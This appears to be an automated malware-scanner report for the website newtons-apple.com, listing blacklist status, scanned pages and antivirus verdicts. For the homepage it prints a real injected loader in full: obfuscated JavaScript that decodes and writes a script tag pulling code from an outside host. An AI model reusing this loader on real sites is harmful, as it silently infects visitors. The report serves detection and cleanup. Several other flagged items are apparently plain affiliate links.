New scan:

Malware Scanner report for newtons-apple.com

Malicious/Suspicious/Total urls checked
6/0/15
6 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "newtons-apple.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/5
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=newtons-apple.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://newtons-apple.com/
200 OK
Content-Length: 38118
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%2631%264E%2631iuuq%264B00kbwbufsn/dpn0pof/kt%2631%264F%264D0tdsjqu%264F1')

Antivirus reports:

nProtect
JS:Trojan.Crypt.KA
F-Secure
JS:Trojan.Crypt.KA
Norman
Inor.A
GData
JS:Trojan.Crypt.KA
BitDefender
JS:Trojan.Crypt.KA

http://newtons-apple.com/wp-includes/js/comment-reply.min.js?ver=3.5.2
200 OK
Content-Length: 786
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19470
Content-Type: text/javascript
clean
http://newtons-apple.com/n/hasbro
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://newtons-apple.com/test404page.js
404 Not Found
Content-Length: 293
Content-Type: text/html
clean
http://newtons-apple.com/n/mega
200 OK
Content-Length: 137719
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<a itemprop='link' href='javascript:void(0);return false;' rel='nofollow' onClick='dt_Ajax_noreturn(\"http://newtons-apple.com/dt/tracklink.php\",\"type=product&storeid=6&productid=27422&upc=\");top.location.href =\"http://www.kqzyfj.com/click-5496185-10651292?url=http%3A%2F%2Fwww.discountschoolsupply.com%2FProduct%2FProductDetail.aspx%3Fproduct%3D27422\";'>");
document.write("<img src='http://newtons-apple.com/dt/logos/gotostore4.jpg' alt='Go To Store'/>");
document.write("</a>");

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J

http://newtons-apple.com/dt/includes/morrow.js
200 OK
Content-Length: 30394
Content-Type: application/x-javascript
clean
http://newtons-apple.com/dt/includes/slider.js
200 OK
Content-Length: 3389
Content-Type: application/x-javascript
clean
http://newtons-apple.com/stores
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://newtons-apple.com/contact
200 OK
Content-Length: 22803
Content-Type: text/html
clean
http://newtons-apple.com/about
200 OK
Content-Length: 23820
Content-Type: text/html
clean
http://newtons-apple.com/d/
200 OK
Content-Length: 131771
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<a itemprop='link' href='javascript:void(0);return false;' rel='nofollow' onClick='dt_Ajax_noreturn(\"http://newtons-apple.com/dt/tracklink.php\",\"type=product&storeid=6&productid=29612&upc=\");top.location.href =\"http://www.tkqlhce.com/click-5496185-10651292?url=http%3A%2F%2Fwww.discountschoolsupply.com%2FProduct%2FProductDetail.aspx%3Fproduct%3D29612\";'>");
document.write("<img src='http://newtons-apple.com/dt/logos/gotostore4.jpg' alt='Go To Store'/>");
document.write("</a>");

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J

http://newtons-apple.com/d/103
200 OK
Content-Length: 132247
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<a itemprop='link' href='javascript:void(0);return false;' rel='nofollow' onClick='dt_Ajax_noreturn(\"http://newtons-apple.com/dt/tracklink.php\",\"type=product&storeid=6&productid=29535&upc=\");top.location.href =\"http://www.dpbolvw.net/click-5496185-10651292?url=http%3A%2F%2Fwww.discountschoolsupply.com%2FProduct%2FProductDetail.aspx%3Fproduct%3D29535\";'>");
document.write("<img src='http://newtons-apple.com/dt/logos/gotostore4.jpg' alt='Go To Store'/>");
document.write("</a>");

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J

http://newtons-apple.com/d/104
200 OK
Content-Length: 130132
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<a itemprop='link' href='javascript:void(0);return false;' rel='nofollow' onClick='dt_Ajax_noreturn(\"http://newtons-apple.com/dt/tracklink.php\",\"type=product&storeid=6&productid=12788&upc=\");top.location.href =\"http://www.jdoqocy.com/click-5496185-10651292?url=http%3A%2F%2Fwww.discountschoolsupply.com%2FProduct%2FProductDetail.aspx%3Fproduct%3D12788\";'>");
document.write("<img src='http://newtons-apple.com/dt/logos/gotostore4.jpg' alt='Go To Store'/>");
document.write("</a>");

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J

http://newtons-apple.com/d/104&offset=20
200 OK
Content-Length: 130797
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<a itemprop='link' href='javascript:void(0);return false;' rel='nofollow' onClick='dt_Ajax_noreturn(\"http://newtons-apple.com/dt/tracklink.php\",\"type=product&storeid=6&productid=16019&upc=\");top.location.href =\"http://www.tkqlhce.com/click-5496185-10651292?url=http%3A%2F%2Fwww.discountschoolsupply.com%2FProduct%2FProductDetail.aspx%3Fproduct%3D16019\";'>");
document.write("<img src='http://newtons-apple.com/dt/logos/gotostore4.jpg' alt='Go To Store'/>");
document.write("</a>");

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: newtons-apple.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 19:59:14 GMT
Pragma: no-cache
Server: Apache/2.0.64 (Unix)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=mskrb3hnmsro6grp87s1scdrc4; path=/
Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Pingback: http://newtons-apple.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: newtons-apple.com
Referer: http://www.google.com/search?q=newtons-apple.com

Result:
The result is similar to the first query. There are no suspicious redirects found.